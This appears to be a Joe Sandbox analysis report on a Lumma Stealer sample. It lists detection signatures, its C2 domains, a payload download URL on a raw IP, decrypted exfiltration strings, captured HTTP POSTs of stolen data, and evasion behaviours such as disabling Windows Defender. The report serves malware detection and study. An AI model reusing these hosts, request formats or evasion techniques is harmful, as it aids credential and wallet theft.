Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1544501
MD5:72495bc5ddc3bd55a1f0c69fe26b528a
SHA1:778a438bb451fb333adfe44c00ac8765bdeff1ef
SHA256:43ffd1d60c05d7b75c4fba5f21cad771f98e6c42af01b767e574143603546579
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 72495BC5DDC3BD55A1F0C69FE26B528A)
    • 7V52BG1QZHX6WU0LEYA.exe (PID: 7752 cmdline: "C:\Users\user~1\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe" MD5: 7860724D095EE801E47A74168A09B6C4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["necklacedmny.store", "thumbystriw.store", "fadehairucw.store", "crisiwarny.store", "founpiuer.store", "navygenerayk.store", "scriptyprefej.store", "presticitpo.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: file.exe PID: 7308JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: file.exe PID: 7308JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
        decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Use Short Name Path in Command Line
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe", CommandLine: "C:\Users\user~1\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7308, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exe", ProcessId: 7752, ProcessName: 7V52BG1QZHX6WU0LEYA.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-29T14:11:21.150507+010020546531A Network Trojan was detected192.168.2.749737188.114.97.3443TCP
          2024-10-29T14:11:22.357036+010020546531A Network Trojan was detected192.168.2.749743188.114.97.3443TCP
          2024-10-29T14:11:38.584275+010020546531A Network Trojan was detected192.168.2.749840188.114.97.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-29T14:11:21.150507+010020498361A Network Trojan was detected192.168.2.749737188.114.97.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-29T14:11:22.357036+010020498121A Network Trojan was detected192.168.2.749743188.114.97.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-29T14:11:39.524381+010020197142Potentially Bad Traffic192.168.2.749847185.215.113.1680TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-29T14:11:29.347854+010020480941Malware Command and Control Activity Detected192.168.2.749781188.114.97.3443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: file.exeAvira: detected
          Found malware configuration
          Source: file.exe.7308.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["necklacedmny.store", "thumbystriw.store", "fadehairucw.store", "crisiwarny.store", "founpiuer.store", "navygenerayk.store", "scriptyprefej.store", "presticitpo.store"], "Build id": "4SD0y4--legendaryy"}
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: file.exeJoe Sandbox ML: detected
          Sample uses string decryption to hide its real strings
          Source: 00000000.00000002.1612184616.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
          Source: 00000000.00000002.1612184616.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
          Source: 00000000.00000002.1612184616.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
          Source: 00000000.00000002.1612184616.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
          Source: 00000000.00000002.1612184616.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
          Source: 00000000.00000002.1612184616.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
          Source: 00000000.00000002.1612184616.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
          Source: 00000000.00000002.1612184616.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
          Source: 00000000.00000002.1612184616.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
          Source: 00000000.00000002.1612184616.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
          Source: 00000000.00000002.1612184616.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
          Source: 00000000.00000002.1612184616.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
          Source: 00000000.00000002.1612184616.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
          Source: 00000000.00000002.1612184616.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
          Source: 00000000.00000002.1612184616.0000000000F91000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49737 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49753 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49781 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49788 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49799 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49815 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49840 version: TLS 1.2
          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 7V52BG1QZHX6WU0LEYA.exe, 00000003.00000003.1618894342.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, 7V52BG1QZHX6WU0LEYA.exe, 00000003.00000002.1751970734.0000000000812000.00000040.00000001.01000000.00000006.sdmp

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49743 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49743 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49737 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49737 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49781 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49840 -> 188.114.97.3:443
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: necklacedmny.store
          Source: Malware configuration extractorURLs: thumbystriw.store
          Source: Malware configuration extractorURLs: fadehairucw.store
          Source: Malware configuration extractorURLs: crisiwarny.store
          Source: Malware configuration extractorURLs: founpiuer.store
          Source: Malware configuration extractorURLs: navygenerayk.store
          Source: Malware configuration extractorURLs: scriptyprefej.store
          Source: Malware configuration extractorURLs: presticitpo.store
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 29 Oct 2024 13:11:39 GMTContent-Type: application/octet-streamContent-Length: 2810880Last-Modified: Tue, 29 Oct 2024 12:11:15 GMTConnection: keep-aliveETag: "6720d0e3-2ae400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 d1 7b 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 62 76 6f 6a 6d 68 65 76 00 a0 2a 00 00 a0 00 00 00 82 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 79 78 68 6a 67 75 68 00 20 00 00 00 40 2b 00 00 06 00 00 00 bc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 c2 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49847 -> 185.215.113.16:80
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12849Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15081Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20406Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1243Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551172Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
          Source: global trafficDNS traffic detected: DNS query: time.windows.com
          Source: global trafficDNS traffic detected: DNS query: presticitpo.store
          Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
          Source: global trafficDNS traffic detected: DNS query: fadehairucw.store
          Source: global trafficDNS traffic detected: DNS query: thumbystriw.store
          Source: global trafficDNS traffic detected: DNS query: necklacedmny.store
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
          Source: file.exe, 00000000.00000003.1609473315.0000000001532000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1620130895.0000000001533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
          Source: file.exe, 00000000.00000003.1609473315.0000000001532000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1620130895.0000000001533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/0
          Source: file.exe, 00000000.00000003.1609473315.0000000001532000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1620130895.0000000001533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/_
          Source: file.exe, 00000000.00000003.1609473315.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1612094849.0000000000F3A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
          Source: file.exe, 00000000.00000003.1609473315.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1619866757.00000000014FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exed
          Source: file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: file.exe, 00000000.00000003.1478178455.0000000005DBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: file.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: file.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: file.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: file.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: file.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: file.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: file.exe, 00000000.00000003.1410146237.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410295645.0000000005CF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410073692.0000000005CFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
